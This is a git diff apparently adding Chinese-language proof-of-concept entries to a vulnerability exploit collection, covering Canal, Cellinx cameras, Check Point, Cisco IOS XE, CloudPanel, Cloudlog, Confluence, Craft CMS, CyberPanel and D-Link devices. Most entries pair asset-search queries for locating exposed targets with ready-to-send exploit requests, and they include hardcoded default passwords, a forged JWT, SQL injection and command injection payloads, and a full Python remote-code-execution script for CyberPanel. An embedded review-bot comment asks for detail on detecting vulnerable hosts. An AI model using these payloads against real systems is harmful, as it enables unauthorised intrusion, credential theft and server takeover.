+- https://github.com/k4nfr3/CVE-2024-9474/blob/main/exploit_fw.py +- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/?123 \ No newline at end of file diff --git a/Canal存在弱口令漏洞.md b/Canal存在弱口令漏洞.md new file mode 100644 index 0000000..5ed6838 --- /dev/null +++ b/Canal存在弱口令漏洞.md @@ -0,0 +1,19 @@ +# Canal存在弱口令漏洞 + +### 一、漏洞描述 +Canal存在弱口令漏洞 + +### 二、影响版本 +![1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466.png](./img/m36C284UAgWGI0RR/1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466-071730.png) + +### 三、漏洞复现 +```plain +admin/123456 +``` + +![1724655456857-34ce2e5a-a0f9-4e50-9cf4-e6d8040556fa.png](./img/m36C284UAgWGI0RR/1724655456857-34ce2e5a-a0f9-4e50-9cf4-e6d8040556fa-735011.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: \ No newline at end of file diff --git a/Canal存在敏感信息泄露漏洞.md b/Canal存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..2a37040 
--- /dev/null +++ b/Canal存在敏感信息泄露漏洞.md @@ -0,0 +1,27 @@ +# Canal存在敏感信息泄露漏洞 + +### 一、漏洞描述 +由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露 + +### 二、影响版本 +![1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466.png](./img/gC-N1JsYpGKl-Ujh/1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466-514319.png) + +### 三、漏洞复现 +```plain +/api/v1/canal/config/1/0 +``` + +```plain +/api/v1/canal/config/0/9 +``` + +```plain +/api/v1/canal/instance/1 +``` + +![1724655404641-4703126f-5cc5-4a11-b276-958eac455a81.png](./img/gC-N1JsYpGKl-Ujh/1724655404641-4703126f-5cc5-4a11-b276-958eac455a81-068083.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: \ No newline at end of file diff --git a/CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞.md b/CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞.md new file mode 100644 index 0000000..39e532f --- /dev/null +++ b/CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞.md @@ -0,0 +1,25 @@ +# Cellinx NVT 摄像机 GetFileContent.cgi 任意文件读取漏洞 + +# 一、漏洞简介 +Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。Cellinx NVT v1.0.6.002b版本存在安全漏洞,该漏洞源于存在本地文件泄露漏洞,攻击者可读取系统密码等敏感信息。 + +# 二、影响版本 ++ Cellinx NVT 摄像机 + +# 三、资产测绘 ++ hunter`web.body="local/NVT-string.js"` ++ 特征 + +![1700147527163-e3d6c796-662b-461d-a2d8-c879b388bfb5.png](./img/qqGC1EAYOXIL_3Db/1700147527163-e3d6c796-662b-461d-a2d8-c879b388bfb5-628657.png) + +# 四、漏洞复现 +```plain +/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd&_=1672577046605 +``` + +![1700147551526-19a4ef00-9add-4be1-af80-70fe238bd21c.png](./img/qqGC1EAYOXIL_3Db/1700147551526-19a4ef00-9add-4be1-af80-70fe238bd21c-591022.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/CheckPoint安全网关MyCRL存在任意文件读取漏洞.md b/CheckPoint安全网关MyCRL存在任意文件读取漏洞.md new file mode 100644 index 0000000..8d825f1 --- /dev/null +++ b/CheckPoint安全网关MyCRL存在任意文件读取漏洞.md 
@@ -0,0 +1,32 @@ +# Check Point安全网关MyCRL存在任意文件读取漏洞 + +# 一、漏洞简介 + Check Point 安全网关是一种功能强大、可扩展的安全解决方案,旨在保护企业网络免受各种网络威胁和攻击它提供了多种安全功能,包括防火墙、虚拟专用网络(VPN)、入侵检测和预防系统(IDPS)、杂货邮件防护、网络地址转换(NAT)、负载均衡和安全信息和事件管理(SIEM)。这些功能使得Check Point 安全网关能够提供高性能、可扩展性和高度安全的保护,满足大型企业的需求。同时,Check Point 安全网关也提供了灵活的管理界面,易于配置和管理 ,Check Point 安全网关 MyCRL接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。 + +# 二、影响版本 ++ Check Point安全网关 + +# 三、资产测绘 +```plain +app="Check_Point-SSL-Network-Extender" +``` + +![1717150853799-cc0ca8e4-ecea-402e-8578-e8d88b708a16.png](./img/ig_1fSGctqaDq-Md/1717150853799-cc0ca8e4-ecea-402e-8578-e8d88b708a16-784297.png) + +# 四、漏洞复现 +```plain +GET /../../../../etc/passwd HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Upgrade-Insecure-Requests: 1 +``` + +![1717150867186-710fd67f-6c19-424f-8c63-7244fa5fac38.png](./img/ig_1fSGctqaDq-Md/1717150867186-710fd67f-6c19-424f-8c63-7244fa5fac38-692802.png) + + + +> 更新: 2024-06-01 11:17:59 +> 原文: \ No newline at end of file diff --git a/Cisco-IOS-XE-CVE-2023-20198权限提升漏洞.md b/Cisco-IOS-XE-CVE-2023-20198权限提升漏洞.md new file mode 100644 index 0000000..6a79ad1 --- /dev/null +++ b/Cisco-IOS-XE-CVE-2023-20198权限提升漏洞.md 
@@ -0,0 +1,86 @@ + +## Cisco IOS XE CVE-2023-20198权限提升漏洞 + + +## poc +请参阅下面的示例请求,该请求绕过易受攻击的 IOS-XE 实例的身份验证。此 POC 创建一个名为baduser权限级别 15 的用户。让我们深入了解详细信息。 + + +![](https://p7i3u3x3.rocketcdn.me/wp-content/uploads/2023/10/Screenshot-2023-10-30-at-2.50.55-PM.png.webp) + +## CVE-2023-20198.yaml +``` +id: CVE-2023-20198 + +info: + name: Cisco IOS XE - Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. + For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory. + Cisco will provide updates on the status of this investigation and when a software patch is available. + impact: | + The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability. 
+ reference: + - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/ + - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/ + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z + - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities + - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2023-20198 + epss-score: 0.9556 + epss-percentile: 0.99188 + cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: cisco + product: ios_xe + shodan-query: http.html_hash:1076109428 + note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution. + tags: cve,cve2023,kev,cisco,rce,auth-bypass +variables: + cmd: uname -a + +http: + - raw: + - |- + POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 + Host: {{Hostname}} + + admin***** {{cmd}} + + matchers: + - type: regex + part: body + regex: + - XMLSchema + - execLog + - Cisco Systems + - + - + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - \n(.*)\[ + +# digest: 4a0a004730450221009b40a4249142eed7d5189033384a64024e155f76f7ca4e22d7ed4e20ea8f578702201f8018ac440528d752437de795fd4e715fa868274f6b94acea7477db80fa0c57:922c64590222798bb761d5b6d8e72950 + +``` + +## 漏洞分析 +``` +https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/ +https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/ +https://mp.weixin.qq.com/s/wH2mpYHTj6gLjMi3GgAKww +``` diff --git a/CloudPanel-RCE漏洞-CVE-2023-35885.md b/CloudPanel-RCE漏洞-CVE-2023-35885.md new file mode 100644 index 0000000..b92567b --- /dev/null 
+++ b/CloudPanel-RCE漏洞-CVE-2023-35885.md @@ -0,0 +1,38 @@ +## CloudPanel RCE漏洞 CVE-2023-35885 +CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机 (VM)、存储、网络和应用程序。CloudPanel存在任意文件上传漏洞,攻击者可以通过接口创建PHP文件来获取服务器权限。 + +## fofa +``` +title=="CloudPanel | Log In" +``` + +`/file-manager/backend/makefile`接口创建文件 +``` +POST /file-manager/backend/makefile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM= +Content-Length: 43 +Content-Type: application/x-www-form-urlencoded + +id=/htdocs/app/files/public/&name=confg.php +``` +`/file-manager/backend/text`接口写入文件内容 +``` + +POST /file-manager/backend/text HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM= +Content-Length: 93 +Content-Type: application/x-www-form-urlencoded + +id=/htdocs/app/files/public/confg.php&content= +``` +文件路径:url\public\confg.php diff --git a/Cloudlog系统request_form存在SQL注入漏洞.md b/Cloudlog系统request_form存在SQL注入漏洞.md new file mode 100644 index 0000000..b3c913d --- /dev/null +++ b/Cloudlog系统request_form存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# Cloudlog系统request_form存在SQL注入漏洞 + +Cloudlog系统接口request_form未授权SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +icon_hash="-460032467" +``` + +## poc + +```javascript +POST /index.php/oqrs/request_form HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (ELT(2469=2469,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +``` + +![image-20241219150127938](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191501995.png) \ No newline at end of file diff --git a/Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞.md b/Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞.md new file mode 100644 index 0000000..e8bd43c --- /dev/null +++ b/Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞.md @@ -0,0 +1,23 @@ +# Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞 + +Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +icon_hash="-460032467" +``` + +## poc + +```javascript +POST /index.php/oqrs/delete_oqrs_line HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +id=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,190))),666) +``` + +![image-20241018155043747](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181550829.png) \ No newline at end of file diff --git a/Confluence-未授权提权访问漏洞.md b/Confluence-未授权提权访问漏洞.md new file mode 100644 index 0000000..fa9d31c --- /dev/null +++ b/Confluence-未授权提权访问漏洞.md 
@@ -0,0 +1,54 @@ +## Confluence 未授权提权访问漏洞 CVE-2023-22515 + +## fofa +app="ATLASSIAN-Confluence" + +## poc yaml格式 +``` +variables: + username: "{{rand_base(10)}}" + password: "{{rand_base(10)}}" + email: "{{username}}@{{password}}" +http: + - raw: + - | + GET /setup/setupadministrator-start.action HTTP/1.1 + Host: {{Hostname}} + - | + GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /setup/setupadministrator-start.action HTTP/1.1 + Host: {{Hostname}} + - | + @timeout:20s + POST /setup/setupadministrator.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Atlassian-Token: no-check + + username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next + - | + POST /dologin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Atlassian-Token: no-check + + os_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action + - | + GET /welcome.action HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - contains(body_1, 'Setup is already complete') + - contains(body_3, 'Please configure the system administrator account for this Confluence installation') + - contains(location_5, '/index.action') + - status_code_5 == 302 + - contains(body_6, 'Administration') + condition: and + +``` + diff --git a/Craft-CMS远程代码执行漏洞CVE-2023-41892.md b/Craft-CMS远程代码执行漏洞CVE-2023-41892.md new file mode 100644 index 0000000..fff12c3 --- /dev/null +++ b/Craft-CMS远程代码执行漏洞CVE-2023-41892.md 
@@ -0,0 +1,14 @@ +## Craft CMS远程代码执行漏洞CVE-2023-41892 + +## 影响版本 +Craft CMS >= 4.0.0-RC1 +Craft CMS <= 4.4.14 + +## exp +``` +POST /index.php HTTP/1.1 +Host: {{Hostname}} +Content-Type: application/x-www-form-urlencoded + +action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}} +``` diff --git a/CrestronHDaj.html存在弱口令漏洞.md b/CrestronHDaj.html存在弱口令漏洞.md new file mode 100644 index 0000000..8060e73 --- /dev/null +++ b/CrestronHDaj.html存在弱口令漏洞.md @@ -0,0 +1,26 @@ +# CrestronHD aj.html存在弱口令漏洞 + +### 一、漏洞描述 +Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息 + +### 二、影响版本 +Crestron HD + +### 三、资产测绘 +```plain +app="Crestron-HD-RX-201-C-E" +``` + +![1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283.png](./img/EPzjpeWI9nlnRK9k/1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283-331289.png) + +### 四、漏洞复现 +```plain +admin/admin +``` + +![1721629670119-17d4514c-c06e-406e-87a7-b511f5f3eb45.png](./img/EPzjpeWI9nlnRK9k/1721629670119-17d4514c-c06e-406e-87a7-b511f5f3eb45-577654.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: \ No newline at end of file diff --git a/CrestronHDaj.html存在账号密码泄漏漏洞.md b/CrestronHDaj.html存在账号密码泄漏漏洞.md new file mode 100644 index 0000000..4b9ad7c --- /dev/null +++ b/CrestronHDaj.html存在账号密码泄漏漏洞.md 
@@ -0,0 +1,26 @@ +# CrestronHD aj.html存在账号密码泄漏漏洞 + +### 一、漏洞描述 +Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息 + +### 二、影响版本 +Crestron HD + +### 三、资产测绘 +```plain +app="Crestron-HD-RX-201-C-E" +``` + +![1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283.png](./img/PPvFl06oFahLD99Q/1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283-902289.png) + +### 四、漏洞复现 +```plain +/aj.html?a=devi +``` + +![1721629619502-e589e5fa-400d-4d2f-b3b2-9c9af3fc7958.png](./img/PPvFl06oFahLD99Q/1721629619502-e589e5fa-400d-4d2f-b3b2-9c9af3fc7958-894426.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: \ No newline at end of file diff --git a/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md b/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md new file mode 100644 index 0000000..791f0ad --- /dev/null +++ b/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md 
@@ -0,0 +1,110 @@ +# CyberPanel需授权命令注入漏洞(CVE-2024-53376) + +CyberPanel开源面板存在一个命令注入漏洞,该漏洞允许远程认证用户构造恶意请求执行任意命令,导致服务器失陷,攻击者可以使用一个HTTP选项请求指示网络服务器运行CyberPanel应用程序执行任何命令。 + +## 影响版本 + +CyberPanel 版本 < 2.3.8 + +## fofa + +```javascript +app="CyberPanel" +``` + +## poc + +```python +#!/usr/bin/python3 +# CVE-2024-53376 +# Exploit Title: CyberPanel - Authenticated Remote Code Execution (RCE) +# Exploit Author: Ryan Putman +# Technical Details: https://github.com/ThottySploity/CVE-2024-53376 +# Date: 2024-12-15 +# Vendor Homepage: https://cyberpanel.net +# Tested On: Cyberpanel < 2.3.8 +# Vulnerability Description: +# Command injection vulnerability in the submitWebsiteCreation endpoint + +import argparse, requests, json +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# Disabling the SSL errors (since CyberPanel runs on a self signed cert) +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +arg_parser = argparse.ArgumentParser() +arg_parser.add_argument('-t', metavar='target', help='ip address or domain of Cyberpanel', required=True) +arg_parser.add_argument('-u', metavar='username', required=True) +arg_parser.add_argument('-p', metavar='password', required=True) +arg_parser.add_argument('-c', metavar='cmd', default='id > /tmp/rce #', help='command to execute') +args = arg_parser.parse_args() + +# Obtaining the CSRF token used for authentication +csrf_token = requests.get(args.t, verify=False).headers.get('Set-Cookie').split(';')[0] + +if len(csrf_token) > 0: + print(f"[+] Obtained the following CSRFTOKEN: {csrf_token}") + +payload = { + "username": args.u, + "password": args.p, + "languageSelection": "english", +} + +headers = { + 'Cookie': csrf_token, + 'Accept': 'application/json', + 'X-Csrftoken': csrf_token.replace('csrftoken=', ''), + 'Origin': 'https://localhost:8090', + 'Referer': 'https://localhost:8090/', + 'Connection': 'close' +} + +# Obtaining the sessionId used for authorization. 
+sessionId = requests.post( + "{}/verifyLogin".format(args.t), + headers=headers, + data=json.dumps(payload), + verify=False, +).headers.get('Set-Cookie').split(';')[1].replace(" Path=/, ", "") + +if len(sessionId) > 0: + print(f"[+] Obtained the following sessionId: {sessionId}") + +exploitHeaders = { + 'Cookie': f'{csrf_token}; django_language=en; {sessionId}', + 'Accept': 'application/json', + 'X-Csrftoken': csrf_token.replace('csrftoken=', ''), + 'Origin': 'https://localhost:8090', + 'Referer': 'https://localhost:8090/', + 'Connection': 'close' +} + +exploitPayload = { + "package": "Default", + "domainName": "cyberpanel.net", + "adminEmail": "cyberpanel@gmail.com", + "phpSelection": f"PHP 8.0'; {args.c}; #", + "ssl":0, + "websiteOwner":"admin", + "dkimCheck":0, + "openBasedir":0, + "mailDomain":0, + "apacheBackend":0, +} + +# Sending the exploit to the vulnerable endpoint +exploitRequest = requests.options(f"{args.t}/websites/submitWebsiteCreation", headers=exploitHeaders, data=json.dumps(exploitPayload), verify=False) + +if exploitRequest.status_code == 200: + print("[+] Exploit succeeded") + print(f"[+] Executed: {args.c}") +``` + + + + + +## 漏洞来源 + +- https://github.com/ThottySploity/CVE-2024-53376 \ No newline at end of file diff --git a/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md b/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md new file mode 100644 index 0000000..b2c0a0e --- /dev/null +++ b/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md @@ -0,0 +1,10 @@ +## D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853) + +D-LINK的Go-RT-AC750 RTAC750_A1_FW_v101b03固件在AlphaNetworks账户中使用了硬编码密码,远程攻击者可以通过telnet会话获得root权限。 + +## poc + +``` +Alphanetworks:wrgac18_dlob.hans_ac750 +``` + diff --git a/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md b/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md new file mode 100644 index 0000000..393d9be --- /dev/null 
+++ b/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md @@ -0,0 +1,31 @@ +# D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914) +D-Link NAS设备 account_mg存在命令执行漏洞 + +## 影响版本 +```java +DNS-320-版本 1.00 +DNS-320LW-版本 1.01.0914.2012 +DNS-325-版本 1.01和 1.02 +DNS-340L-版本 1.08 +``` + +## fofa +```java +app="D_Link-DNS-ShareCenter" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png) + +## poc +```java +GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336023387-187f8fb1-9ff9-44a2-8e5d-f7ac5d81b3cc.png) + diff --git a/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md b/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md new file mode 100644 index 0000000..45cd37d --- /dev/null +++ b/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md @@ -0,0 +1,23 @@ +# D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞 +D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞 + +## fofa +```java +body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png) + +## poc +```java +GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo; +``` + +![image-20241122152945481](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221529540.png) + 
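Review bot: in D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md the description repeats the title verbatim and there is no 影响版本 section at all, unlike the account_mgr entry in the same commit; state the affected models and firmware. The fofa query and the HTTP request are fenced as ```java although neither is Java code. The request injects into the `Cookie: username=` value but the text does not say what in the response marks a vulnerable host (the request echoes a marker string for that purpose); add that so the finding can be validated.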
diff --git a/D-LinkD-View8JWT认证绕过漏洞.md b/D-LinkD-View8JWT认证绕过漏洞.md new file mode 100644 index 0000000..4137f88 --- /dev/null +++ b/D-LinkD-View8JWT认证绕过漏洞.md @@ -0,0 +1,31 @@ +# D-Link D-View 8 JWT认证绕过漏洞 + +# 一、漏洞简介 +D-Link D-View 8是一款高度可定制且易于扩展的网络管理软件,可为任何规模的企业网络基础设施提供端到端的可管理性,支持多厂商设备监控和流量管理,提供实时网络概览和远程位置集中管理等功能。D-Link D-View 8在v2.0.1.28及之前版本中存在硬编码密钥漏洞,由于默认情况下,初始管理员的userId是相同的,未授权攻击者可以利用JWT密钥配合该userId伪造令牌,从而访问受保护的API路由。 + +# 二、影响版本 ++ D-Link D-View 8 + +# 三、资产测绘 ++ hunter`web.title="D-View 8"` ++ 特征 + +![1701839567675-ed66c07f-aea6-4850-b7c7-c49d862e1d91.png](./img/v1c7cZkWlNWzcNJU/1701839567675-ed66c07f-aea6-4850-b7c7-c49d862e1d91-937841.png) + +# 四、漏洞复现 +```plain +GET /dview8/api/usersByLevel HTTP/1.1 +Host: xx.xx.xx.xx +Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI +``` + +![1701839603018-11b6a9b7-e5b8-47e8-81db-8a15049decbd.png](./img/v1c7cZkWlNWzcNJU/1701839603018-11b6a9b7-e5b8-47e8-81db-8a15049decbd-081010.png) + +可通过获取的账号密码抓取登录数据包,替换用户名及加密密码后登录后台 + +![1701839763056-977928a1-6f42-4bd7-b2db-4351ec46a01a.png](./img/v1c7cZkWlNWzcNJU/1701839763056-977928a1-6f42-4bd7-b2db-4351ec46a01a-839628.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/D-LinkDAR上网行为审计网关importhtml远程命令执行漏洞.md b/D-LinkDAR上网行为审计网关importhtml远程命令执行漏洞.md new file mode 100644 index 0000000..e75f427 --- /dev/null +++ b/D-LinkDAR上网行为审计网关importhtml远程命令执行漏洞.md 
